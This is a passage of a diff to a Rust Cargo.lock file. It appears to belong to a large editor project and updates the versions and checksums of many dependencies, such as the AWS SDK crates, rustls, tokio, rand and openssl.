"1.88.0" +version = "1.94.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d05b276777560aa9a196dbba2e3aada4d8006d3d7eeb3ba7fe0c317227d933c4" +checksum = "699da1961a289b23842d88fe2984c6ff68735fdf9bdcbc69ceaeb2491c9bf434" dependencies = [ "aws-credential-types", "aws-runtime", "aws-smithy-async", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1537,21 +1546,23 @@ dependencies = [ "bytes 1.11.1", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "regex-lite", "tracing", ] [[package]] name = "aws-sdk-ssooidc" -version = "1.90.0" +version = "1.96.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9be14d6d9cd761fac3fd234a0f47f7ed6c0df62d83c0eeb7012750e4732879b" +checksum = "e3e3a4cb3b124833eafea9afd1a6cc5f8ddf3efefffc6651ef76a03cbc6b4981" dependencies = [ "aws-credential-types", "aws-runtime", "aws-smithy-async", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-runtime", "aws-smithy-runtime-api", "aws-smithy-types", @@ -1559,21 +1570,23 @@ dependencies = [ "bytes 1.11.1", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "regex-lite", "tracing", ] [[package]] name = "aws-sdk-sts" -version = "1.90.0" +version = "1.98.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "98a862d704c817d865c8740b62d8bbeb5adcb30965e93b471df8a5bcefa20a80" +checksum = "89c4f19655ab0856375e169865c91264de965bd74c407c7f1e403184b1049409" dependencies = [ "aws-credential-types", "aws-runtime", "aws-smithy-async", "aws-smithy-http", "aws-smithy-json", + "aws-smithy-observability", "aws-smithy-query", "aws-smithy-runtime", "aws-smithy-runtime-api", @@ -1582,15 +1595,16 @@ dependencies = [ "aws-types", "fastrand 2.3.0", "http 0.2.12", + "http 1.3.1", "regex-lite", "tracing", ] [[package]] name = "aws-sigv4" -version = "1.3.6" +version = "1.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c35452ec3f001e1f2f6db107b6373f1f48f05ec63ba2c5c9fa91f07dad32af11" +checksum = "68f6ae9b71597dc5fd115d52849d7a5556ad9265885ad3492ea8d73b93bbc46e" dependencies = [ "aws-credential-types", "aws-smithy-eventstream", @@ -1616,9 +1630,9 @@ dependencies = [ [[package]] name = "aws-smithy-async" -version = "1.2.6" +version = "1.2.14" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "127fcfad33b7dfc531141fda7e1c402ac65f88aca5511a4d31e2e3d2cd01ce9c" +checksum = "2ffcaf626bdda484571968400c326a244598634dc75fd451325a54ad1a59acfc" dependencies = [ "futures-util", "pin-project-lite", @@ -1627,17 +1641,18 @@ dependencies = [ [[package]] name = "aws-smithy-checksums" -version = "0.63.11" +version = "0.64.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "95bd108f7b3563598e4dc7b62e1388c9982324a2abd622442167012690184591" +checksum = "a764fa7222922f6c0af8eea478b0ef1ba5ce1222af97e01f33ca5e957bd7f3b9" dependencies = [ "aws-smithy-http", "aws-smithy-types", "bytes 1.11.1", "crc-fast", "hex", - "http 0.2.12", - "http-body 0.4.6", + "http 1.3.1", + "http-body 1.0.1", + "http-body-util", "md-5", "pin-project-lite", "sha1", @@ -1647,9 +1662,9 @@ dependencies = [ [[package]] name = "aws-smithy-eventstream" -version = "0.60.13" +version = "0.60.20" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e29a304f8319781a39808847efb39561351b1bb76e933da7aa90232673638658" +checksum = "faf09d74e5e32f76b8762da505a3cd59303e367a664ca67295387baa8c1d7548" dependencies = [ "aws-smithy-types", "bytes 1.11.1", @@ -1658,9 +1673,9 @@ dependencies = [ [[package]] name = "aws-smithy-http" -version = "0.62.5" +version = "0.63.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "445d5d720c99eed0b4aa674ed00d835d9b1427dd73e04adaf2f94c6b2d6f9fca" +checksum = "af4a8a5fe3e4ac7ee871237c340bbce13e982d37543b65700f4419e039f5d78e" dependencies = [ "aws-smithy-eventstream", "aws-smithy-runtime-api", @@ -1669,9 +1684,9 @@ dependencies = [ "bytes-utils", "futures-core", "futures-util", - "http 0.2.12", "http 1.3.1", - "http-body 0.4.6", + "http-body 1.0.1", + "http-body-util", "percent-encoding", "pin-project-lite", "pin-utils", @@ -1680,9 +1695,9 @@ dependencies = [ [[package]] name = "aws-smithy-http-client" -version = "1.1.4" +version = "1.1.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "623254723e8dfd535f566ee7b2381645f8981da086b5c4aa26c0c41582bb1d2c" +checksum = "0709f0083aa19b704132684bc26d3c868e06bd428ccc4373b0b55c3e8748a58b" dependencies = [ "aws-smithy-async", "aws-smithy-runtime-api", @@ -1695,42 +1710,42 @@ dependencies = [ "hyper 0.14.32", "hyper 1.7.0", "hyper-rustls 0.24.2", - "hyper-rustls 0.27.7", + "hyper-rustls 0.27.9", "hyper-util", "pin-project-lite", "rustls 0.21.12", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-pki-types", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tower 0.5.2", "tracing", ] [[package]] name = "aws-smithy-json" -version = "0.61.7" +version = "0.62.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2db31f727935fc63c6eeae8b37b438847639ec330a9161ece694efba257e0c54" +checksum = "9648b0bb82a2eedd844052c6ad2a1a822d1f8e3adee5fbf668366717e428856a" dependencies = [ "aws-smithy-types", ] [[package]] name = "aws-smithy-observability" -version = "0.1.4" +version = "0.2.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2d1881b1ea6d313f9890710d65c158bdab6fb08c91ea825f74c1c8c357baf4cc" +checksum = "4d3f39d5bb871aaf461d59144557f16d5927a5248a983a40654d9cf3b9ba183b" dependencies = [ "aws-smithy-runtime-api", ] [[package]] name = "aws-smithy-query" -version = "0.60.8" +version = "0.60.15" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d28a63441360c477465f80c7abac3b9c4d075ca638f982e605b7dc2a2c7156c9" +checksum = "1a56d79744fb3edb5d722ef79d86081e121d3b9422cb209eb03aea6aa4f21ebd" dependencies = [ "aws-smithy-types", "urlencoding", @@ -1738,9 +1753,9 @@ dependencies = [ [[package]] name = "aws-smithy-runtime" -version = "1.9.4" +version = "1.10.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0bbe9d018d646b96c7be063dd07987849862b0e6d07c778aad7d93d1be6c1ef0" +checksum = "8fd3dfc18c1ce097cf81fced7192731e63809829c6cbf933c1ec47452d08e1aa" dependencies = [ "aws-smithy-async", "aws-smithy-http", @@ -1754,6 +1769,7 @@ dependencies = [ "http 1.3.1", "http-body 0.4.6", "http-body 1.0.1", + "http-body-util", "pin-project-lite", "pin-utils", "tokio", @@ -1762,9 +1778,9 @@ dependencies = [ [[package]] name = "aws-smithy-runtime-api" -version = "1.9.2" +version = "1.11.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ec7204f9fd94749a7c53b26da1b961b4ac36bf070ef1e0b94bb09f79d4f6c193" +checksum = "8c55e0837e9b8526f49e0b9bfa9ee18ddee70e853f5bc09c5d11ebceddcb0fec" dependencies = [ "aws-smithy-async", "aws-smithy-types", @@ -1779,9 +1795,9 @@ dependencies = [ [[package]] name = "aws-smithy-types" -version = "1.3.4" +version = "1.4.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "25f535879a207fce0db74b679cfc3e91a3159c8144d717d55f5832aea9eef46e" +checksum = "9d73dbfbaa8e4bc57b9045137680b958d274823509a360abfd8e1d514d40c95c" dependencies = [ "base64-simd", "bytes 1.11.1", @@ -1805,18 +1821,18 @@ dependencies = [ [[package]] name = "aws-smithy-xml" -version = "0.60.12" +version = "0.60.15" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eab77cdd036b11056d2a30a7af7b775789fb024bf216acc13884c6c97752ae56" +checksum = "0ce02add1aa3677d022f8adf81dcbe3046a95f17a1b1e8979c145cd21d3d22b3" dependencies = [ "xmlparser", ] [[package]] name = "aws-types" -version = "1.3.10" +version = "1.3.12" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d79fb68e3d7fe5d4833ea34dc87d2e97d26d3086cb3da660bb6b1f76d98680b6" +checksum = "6c50f3cdf47caa8d01f2be4a6663ea02418e892f9bbfd82c7b9a3a37eaccdd3a" dependencies = [ "aws-credential-types", "aws-smithy-async", @@ -2242,7 +2258,7 @@ dependencies = [ "language", "log", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "rope", "settings", "sum_tree", @@ -2493,7 +2509,7 @@ dependencies = [ "memmap2", "num-traits", "num_cpus", - "rand 0.9.3", + "rand 0.9.4", "rand_distr", "rayon", "safetensors", @@ -2577,7 +2593,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "0acb89ccf798a28683f00089d0630dfaceec087234eae0d308c05ddeaa941b40" dependencies = [ "ambient-authority", - "rand 0.8.5", + "rand 0.8.6", ] [[package]] @@ -2978,7 +2994,7 @@ dependencies = [ "parking_lot", "paths", "postage", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "rpc", @@ -2998,7 +3014,7 @@ dependencies = [ "tiny_http", "tokio", "tokio-native-tls", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tokio-socks", "url", "util", @@ -3229,7 +3245,7 @@ dependencies = [ "prometheus", "prompt_store", "prost 0.9.0", - "rand 0.9.3", + "rand 0.9.4", "recent_projects", "release_channel", "remote", @@ -3568,7 +3584,7 @@ dependencies = [ "parking_lot", "pollster 0.4.0", "postage", - "rand 0.9.3", + "rand 0.9.4", "schemars 1.0.4", "serde", "serde_json", @@ -4141,15 +4157,14 @@ checksum = "19d374276b40fb8bbdee95aef7c7fa6b5316ec764510eb64b8dd0e2ed0d7e7f5" [[package]] name = "crc-fast" -version = "1.6.0" +version = "1.9.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6ddc2d09feefeee8bd78101665bd8645637828fa9317f9f292496dbbd8c65ff3" +checksum = "2fd92aca2c6001b1bf5ba0ff84ee74ec8501b52bbef0cac80bf25a6c1d87a83d" dependencies = [ "crc", "digest", - "rand 0.9.3", - "regex", "rustversion", + "spin 0.10.0", ] [[package]] @@ -4936,7 +4951,7 @@ dependencies = [ "markdown", "pretty_assertions", "project", - "rand 0.9.3", + "rand 0.9.4", "serde", "serde_json", "settings", @@ -5006,7 +5021,7 @@ dependencies = [ "libc", "option-ext", "redox_users", - "windows-sys 0.61.2", + "windows-sys 0.59.0", ] [[package]] @@ -5262,7 +5277,7 @@ dependencies = [ "pretty_assertions", "project", "pulldown-cmark 0.13.0", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "semver", @@ -5327,7 +5342,7 @@ dependencies = [ "pretty_assertions", "project", "prompt_store", - "rand 0.9.3", + "rand 0.9.4", "release_channel", "reqwest_client", "rust-embed", @@ -5488,7 +5503,7 @@ dependencies = [ "project", "proptest", "proptest-derive", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "rope", @@ -5795,7 +5810,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb" dependencies = [ "libc", - "windows-sys 0.61.2", + "windows-sys 0.52.0", ] [[package]] @@ -6391,7 +6406,7 @@ checksum = "4203231de188ebbdfb85c11f3c20ca2b063945710de04e7b59268731e728b462" dependencies = [ "half", "num-traits", - "rand 0.9.3", + "rand 0.9.4", "rand_distr", ] @@ -6862,7 +6877,7 @@ dependencies = [ "fnv", "itertools 0.10.5", "num-traits", - "rand 0.8.5", + "rand 0.8.6", "rand_pcg", "random_choice", "rayon", @@ -7253,7 +7268,7 @@ dependencies = [ "gobject-sys", "libc", "system-deps", - "windows-sys 0.61.2", + "windows-sys 0.52.0", ] [[package]] @@ -7274,7 +7289,7 @@ dependencies = [ "log", "parking_lot", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "regex", "rope", "schemars 1.0.4", @@ -7325,7 +7340,7 @@ dependencies = [ "menu", "project", "project_panel", - "rand 0.9.3", + "rand 0.9.4", "remote_connection", "search", "serde_json", @@ -7399,7 +7414,7 @@ dependencies = [ "project", "prompt_store", "proto", - "rand 0.9.3", + "rand 0.9.4", "remote", "remote_connection", "schemars 1.0.4", @@ -7685,7 +7700,7 @@ dependencies = [ "postage", "profiling", "proptest", - "rand 0.9.3", + "rand 0.9.4", "raw-window-handle", "refineable", "regex", @@ -7921,7 +7936,7 @@ dependencies = [ "itertools 0.14.0", "log", "parking_lot", - "rand 0.9.3", + "rand 0.9.4", "raw-window-handle", "smallvec", "util", @@ -7964,9 +7979,9 @@ dependencies = [ [[package]] name = "grid" -version = "1.0.0" +version = "1.0.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f9e2d4c0a8296178d8802098410ca05d86b17a10bb5ab559b3fb404c1f948220" +checksum = "b40ca9252762c466af32d0b1002e91e4e1bc5398f77455e55474deb466355ff5" [[package]] name = "group" @@ -8027,7 +8042,7 @@ dependencies = [ "cfg-if", "crunchy", "num-traits", - "rand 0.9.3", + "rand 0.9.4", "rand_distr", "zerocopy", ] @@ -8431,7 +8446,7 @@ dependencies = [ name = "http_client_tls" version = "0.1.0" dependencies = [ - "rustls 0.23.33", + "rustls 0.23.40", "rustls-platform-verifier", ] @@ -8516,26 +8531,24 @@ dependencies = [ "hyper 0.14.32", "log", "rustls 0.21.12", - "rustls-native-certs 0.6.3", "tokio", "tokio-rustls 0.24.1", ] [[package]] name = "hyper-rustls" -version = "0.27.7" +version = "0.27.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e3c93eb611681b207e1fe55d5a71ecf91572ec8a6705cdb6857f7d8d5242cf58" +checksum = "33ca68d021ef39cf6463ab54c1d0f5daf03377b70561305bb89a8f83aab66e0f" dependencies = [ "http 1.3.1", "hyper 1.7.0", "hyper-util", "log", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", - "rustls-pki-types", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tower-service", ] @@ -8583,7 +8596,7 @@ dependencies = [ "libc", "percent-encoding", "pin-project-lite", - "socket2 0.5.10", + "socket2 0.6.3", "tokio", "tower-service", "tracing", @@ -9040,8 +9053,8 @@ dependencies = [ "fnv", "lazy_static", "libc", - "mio 1.1.0", - "rand 0.8.5", + "mio 1.2.0", + "rand 0.8.6", "serde", "tempfile", "uuid", @@ -9138,9 +9151,9 @@ dependencies = [ [[package]] name = "itoa" -version = "1.0.15" +version = "1.0.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4a5f13b858c8d314ee3e8f639011f7ccefe71f97f96e50151fb991f267928e2c" +checksum = "8f42a60cbdf9a97f5d2305f08a87dc4e09308d1276d28c869c684d7777685682" [[package]] name = "jiff" @@ -9484,7 +9497,7 @@ dependencies = [ "parking_lot", "postage", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "regex", "rpc", "semver", @@ -9861,9 +9874,9 @@ checksum = "2c4a545a15244c7d945065b5d392b2d2d7f21526fba56ce51467b06ed445e8f7" [[package]] name = "libc" -version = "0.2.182" +version = "0.2.186" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6800badb6cb2082ffd7b6a67e6125bb39f18782f793520caee8cb8846be06112" +checksum = "68ab91017fe16c622486840e4c83c9a37afeff978bd239b5293d61ece587de66" [[package]] name = "libdbus-sys" @@ -10083,7 +10096,7 @@ dependencies = [ "parking_lot", "pbjson-types", "prost 0.12.6", - "rand 0.9.3", + "rand 0.9.4", "reqwest 0.12.24", "rustls-native-certs 0.6.3", "scopeguard", @@ -10091,7 +10104,7 @@ dependencies = [ "sha2", "thiserror 1.0.69", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tokio-tungstenite 0.28.0", "url", ] @@ -10243,11 +10256,11 @@ dependencies = [ [[package]] name = "lru" -version = "0.12.5" +version = "0.16.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "234cf4f4a04dc1f57e24b96cc0cd600cf2af460d4161ac5ecdd0af8e1f3b2a38" +checksum = "7f66e8d5d03f609abc3a39e6f08e4164ebf1447a732906d39eb9b99b7919ef39" dependencies = [ - "hashbrown 0.15.5", + "hashbrown 0.16.1", ] [[package]] @@ -10833,9 +10846,9 @@ dependencies = [ [[package]] name = "mio" -version = "1.1.0" +version = "1.2.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "69d83b0086dc8ecf3ce9ae2874b2d1290252e2a30720bea58a5c6639b0092873" +checksum = "50b7e5b27aa02a74bac8c3f23f448f8d87ff11f92d3aac1a6ed369ee08cc56c1" dependencies = [ "libc", "log", @@ -10919,7 +10932,7 @@ dependencies = [ "log", "parking_lot", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "rope", "serde", "settings", @@ -10972,7 +10985,7 @@ version = "0.4.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3ffa00dec017b5b1a8b7cf5e2c008bfda1aa7e0697ac1508b491fdf2622fb4d8" dependencies = [ - "rand 0.8.5", + "rand 0.8.6", ] [[package]] @@ -10986,17 +10999,17 @@ dependencies = [ [[package]] name = "native-tls" -version = "0.2.14" +version = "0.2.18" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "87de3442987e9dbec73158d5c715e7ad9072fda936bb03d19d7fa10e00520f0e" +checksum = "465500e14ea162429d264d44189adc38b199b62b1c21eea9f69e4b73cb03bbf2" dependencies = [ "libc", "log", "openssl", - "openssl-probe", + "openssl-probe 0.2.1", "openssl-sys", "schannel", - "security-framework 2.11.1", + "security-framework 3.5.1", "security-framework-sys", "tempfile", ] @@ -11213,7 +11226,7 @@ dependencies = [ "kqueue", "libc", "log", - "mio 1.1.0", + "mio 1.2.0", "notify-types", "walkdir", "windows-sys 0.60.2", @@ -11250,7 +11263,7 @@ version = "0.50.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7957b9740744892f114936ab4a57b3f487491bbeafaf8083688b16841a4240e5" dependencies = [ - "windows-sys 0.61.2", + "windows-sys 0.59.0", ] [[package]] @@ -11309,7 +11322,7 @@ dependencies = [ "num-integer", "num-iter", "num-traits", - "rand 0.8.5", + "rand 0.8.6", "smallvec", "zeroize", ] @@ -11325,7 +11338,7 @@ dependencies = [ "num-iter", "num-traits", "once_cell", - "rand 0.9.3", + "rand 0.9.4", "serde", "smallvec", "zeroize", @@ -11679,7 +11692,7 @@ dependencies = [ "http-body 1.0.1", "http-body-util", "hyper 1.7.0", - "hyper-rustls 0.27.7", + "hyper-rustls 0.27.9", "hyper-timeout", "hyper-util", "jsonwebtoken", @@ -11819,7 +11832,7 @@ dependencies = [ "language_model_core", "log", "pretty_assertions", - "rand 0.9.3", + "rand 0.9.4", "schemars 1.0.4", "serde", "serde_json", @@ -11894,15 +11907,14 @@ dependencies = [ [[package]] name = "openssl" -version = "0.10.74" +version = "0.10.79" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "24ad14dd45412269e1a30f52ad8f0664f0f4f4a89ee8fe28c3b3527021ebb654" +checksum = "bf0b434746ee2832f4f0baf10137e1cabb18cbe6912c69e2e33263c45250f542" dependencies = [ "bitflags 2.10.0", "cfg-if", "foreign-types 0.3.2", "libc", - "once_cell", "openssl-macros", "openssl-sys", ] @@ -11924,11 +11936,17 @@ version = "0.1.6" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d05e27ee213611ffe7d6348b942e8f942b37114c00cc03cec254295a4a17852e" +[[package]] +name = "openssl-probe" +version = "0.2.1" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "7c87def4c32ab89d880effc9e097653c8da5d6ef28e6b539d313baaacfbafcbe" + [[package]] name = "openssl-sys" -version = "0.9.110" +version = "0.9.115" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0a9f0075ba3c21b09f8e8b2026584b1d18d49388648f2fbbf3c97ea8deced8e2" +checksum = "158fe5b292746440aa6e7a7e690e55aeb72d41505e2804c23c6973ad0e9c9781" dependencies = [ "cc", "libc", @@ -12867,7 +12885,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "3c80231409c20246a13fddb31776fb942c38553c51e871f8cbd687a4cfb5843d" dependencies = [ "phf_shared 0.11.3", - "rand 0.8.5", + "rand 0.8.6", ] [[package]] @@ -13455,7 +13473,7 @@ dependencies = [ "prettier", "pretty_assertions", "project", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "remote", @@ -13632,7 +13650,7 @@ dependencies = [ "bitflags 2.10.0", "num-traits", "proptest-macro", - "rand 0.9.3", + "rand 0.9.4", "rand_chacha 0.9.0", "rand_xorshift", "regex-syntax", @@ -13976,8 +13994,8 @@ dependencies = [ "quinn-proto", "quinn-udp", "rustc-hash 2.1.1", - "rustls 0.23.33", - "socket2 0.5.10", + "rustls 0.23.40", + "socket2 0.6.3", "thiserror 2.0.17", "tokio", "tracing", @@ -13986,17 +14004,17 @@ dependencies = [ [[package]] name = "quinn-proto" -version = "0.11.13" +version = "0.11.14" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f1906b49b0c3bc04b5fe5d86a77925ae6524a19b816ae38ce1e426255f1d8a31" +checksum = "434b42fec591c96ef50e21e886936e66d3cc3f737104fdb9b737c40ffb94c098" dependencies = [ "bytes 1.11.1", "getrandom 0.3.4", "lru-slab", - "rand 0.9.3", + "rand 0.9.4", "ring", "rustc-hash 2.1.1", - "rustls 0.23.33", + "rustls 0.23.40", "rustls-pki-types", "slab", "thiserror 2.0.17", @@ -14014,9 +14032,9 @@ dependencies = [ "cfg_aliases 0.2.1", "libc", "once_cell", - "socket2 0.5.10", + "socket2 0.6.3", "tracing", - "windows-sys 0.60.2", + "windows-sys 0.52.0", ] [[package]] @@ -14065,9 +14083,9 @@ dependencies = [ [[package]] name = "rand" -version = "0.8.5" +version = "0.8.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "34af8d1a0e25924bc5b7c43c079c942339d8f0a8b57c39049bef581b46327404" +checksum = "5ca0ecfa931c29007047d1bc58e623ab12e5590e8c7cc53200d5202b69266d8a" dependencies = [ "libc", "rand_chacha 0.3.1", @@ -14076,9 +14094,9 @@ dependencies = [ [[package]] name = "rand" -version = "0.9.3" +version = "0.9.4" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7ec095654a25171c2124e9e3393a930bddbffdc939556c914957a4c3e0a87166" +checksum = "44c5af06bb1b7d3216d91932aed5265164bf384dc89cd6ba05cf59a35f5f76ea" dependencies = [ "rand_chacha 0.9.0", "rand_core 0.9.3", @@ -14144,7 +14162,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "6a8615d50dcf34fa31f7ab52692afec947c4dd0ab803cc87cb3b0b4570ff7463" dependencies = [ "num-traits", - "rand 0.9.3", + "rand 0.9.4", ] [[package]] @@ -14222,7 +14240,7 @@ dependencies = [ "num-traits", "paste", "profiling", - "rand 0.9.3", + "rand 0.9.4", "rand_chacha 0.9.0", "simd_helpers", "thiserror 2.0.17", @@ -14774,22 +14792,22 @@ dependencies = [ "http-body 1.0.1", "http-body-util", "hyper 1.7.0", - "hyper-rustls 0.27.7", + "hyper-rustls 0.27.9", "hyper-util", "js-sys", "log", "percent-encoding", "pin-project-lite", "quinn", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-pki-types", "serde", "serde_json", "serde_urlencoded", "sync_wrapper 1.0.2", "tokio", - "tokio-rustls 0.26.2", + "tokio-rustls 0.26.4", "tower 0.5.2", "tower-http 0.6.6", "tower-service", @@ -14961,7 +14979,7 @@ dependencies = [ "dasp_sample", "hound", "num-rational", - "rand 0.9.3", + "rand 0.9.4", "rand_distr", "rtrb", "symphonia", @@ -14977,7 +14995,7 @@ dependencies = [ "gpui", "heapless", "log", - "rand 0.9.3", + "rand 0.9.4", "rayon", "sum_tree", "tracing", @@ -15016,7 +15034,7 @@ dependencies = [ "gpui", "parking_lot", "proto", - "rand 0.9.3", + "rand 0.9.4", "rsa", "serde", "serde_json", @@ -15162,7 +15180,7 @@ dependencies = [ "borsh", "bytes 1.11.1", "num-traits", - "rand 0.8.5", + "rand 0.8.6", "rkyv", "serde", "serde_json", @@ -15232,7 +15250,7 @@ dependencies = [ "errno 0.3.14", "libc", "linux-raw-sys 0.11.0", - "windows-sys 0.61.2", + "windows-sys 0.52.0", ] [[package]] @@ -15270,16 +15288,16 @@ dependencies = [ [[package]] name = "rustls" -version = "0.23.33" +version = "0.23.40" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "751e04a496ca00bb97a5e043158d23d66b5aabf2e1d5aa2a0aaebb1aafe6f82c" +checksum = "ef86cd5876211988985292b91c96a8f2d298df24e75989a43a3c73f2d4d8168b" dependencies = [ "aws-lc-rs", "log", "once_cell", "ring", "rustls-pki-types", - "rustls-webpki 0.103.7", + "rustls-webpki 0.103.13", "subtle", "zeroize", ] @@ -15290,7 +15308,7 @@ version = "0.6.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "a9aace74cb666635c918e9c12bc0d348266037aa8eb599b5cba565709a8dff00" dependencies = [ - "openssl-probe", + "openssl-probe 0.1.6", "rustls-pemfile 1.0.4", "schannel", "security-framework 2.11.1", @@ -15298,11 +15316,11 @@ dependencies = [ [[package]] name = "rustls-native-certs" -version = "0.8.2" +version = "0.8.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9980d917ebb0c0536119ba501e90834767bffc3d60641457fd84a1f3fd337923" +checksum = "612460d5f7bea540c490b2b6395d8e34a953e52b491accd6c86c8164c5932a63" dependencies = [ - "openssl-probe", + "openssl-probe 0.2.1", "rustls-pki-types", "schannel", "security-framework 3.5.1", @@ -15347,10 +15365,10 @@ dependencies = [ "jni", "log", "once_cell", - "rustls 0.23.33", - "rustls-native-certs 0.8.2", + "rustls 0.23.40", + "rustls-native-certs 0.8.3", "rustls-platform-verifier-android", - "rustls-webpki 0.103.7", + "rustls-webpki 0.103.13", "security-framework 3.5.1", "security-framework-sys", "webpki-root-certs", @@ -15375,9 +15393,9 @@ dependencies = [ [[package]] name = "rustls-webpki" -version = "0.103.7" +version = "0.103.13" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e10b3f4191e8a80e6b43eebabfac91e5dcecebb27a71f04e820c47ec41d314bf" +checksum = "61c429a8649f110dddef65e2a5ad240f747e85f7758a6bccc7e5777bd33f756e" dependencies = [ "aws-lc-rs", "ring", @@ -15423,9 +15441,9 @@ dependencies = [ [[package]] name = "ryu" -version = "1.0.20" +version = "1.0.23" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28d3b2b1366ec20994f1fd18c3c594f05c5dd4bc44d8bb0c1c632c8d6829481f" +checksum = "9774ba4a74de5f7b1c1451ed6cd5285a32eddb5cccb8cc655a4e50009e06477f" [[package]] name = "saa" @@ -15481,7 +15499,7 @@ dependencies = [ "flume", "futures 0.3.32", "parking_lot", - "rand 0.9.3", + "rand 0.9.4", "web-time", ] @@ -16591,12 +16609,12 @@ dependencies = [ [[package]] name = "socket2" -version = "0.6.1" +version = "0.6.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "17129e116933cf371d018bb80ae557e889637989d8638274fb25622827b03881" +checksum = "3a766e1110788c36f4fa1c2b71b387a7815aa65f88ce0229841826633d93723e" dependencies = [ "libc", - "windows-sys 0.60.2", + "windows-sys 0.61.2", ] [[package]] @@ -16731,7 +16749,7 @@ dependencies = [ "once_cell", "percent-encoding", "rust_decimal", - "rustls 0.23.33", + "rustls 0.23.40", "serde", "serde_json", "sha2", @@ -16815,7 +16833,7 @@ dependencies = [ "memchr", "once_cell", "percent-encoding", - "rand 0.8.5", + "rand 0.8.6", "rsa", "rust_decimal", "serde", @@ -16859,7 +16877,7 @@ dependencies = [ "memchr", "num-bigint", "once_cell", - "rand 0.8.5", + "rand 0.8.6", "rust_decimal", "serde", "serde_json", @@ -16958,7 +16976,7 @@ name = "streaming_diff" version = "0.1.0" dependencies = [ "ordered-float 2.10.1", - "rand 0.9.3", + "rand 0.9.4", "rope", "util", ] @@ -17082,7 +17100,7 @@ dependencies = [ "heapless", "log", "proptest", - "rand 0.9.3", + "rand 0.9.4", "rayon", "tracing", "zlog", @@ -17720,7 +17738,7 @@ dependencies = [ "getrandom 0.3.4", "once_cell", "rustix 1.1.2", - "windows-sys 0.61.2", + "windows-sys 0.52.0", ] [[package]] @@ -17759,7 +17777,7 @@ dependencies = [ "log", "parking_lot", "percent-encoding", - "rand 0.9.3", + "rand 0.9.4", "regex", "release_channel", "schemars 1.0.4", @@ -17842,7 +17860,7 @@ dependencies = [ "log", "parking_lot", "postage", - "rand 0.9.3", + "rand 0.9.4", "regex", "rope", "smallvec", @@ -18179,17 +18197,17 @@ dependencies = [ [[package]] name = "tokio" -version = "1.48.0" +version = "1.52.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ff360e02eab121e0bc37a2d3b4d4dc622e6eda3a8e5253d5435ecf5bd4c68408" +checksum = "b67dee974fe86fd92cc45b7a95fdd2f99a36a6d7b0d431a231178d3d670bbcc6" dependencies = [ "bytes 1.11.1", "libc", - "mio 1.1.0", + "mio 1.2.0", "parking_lot", 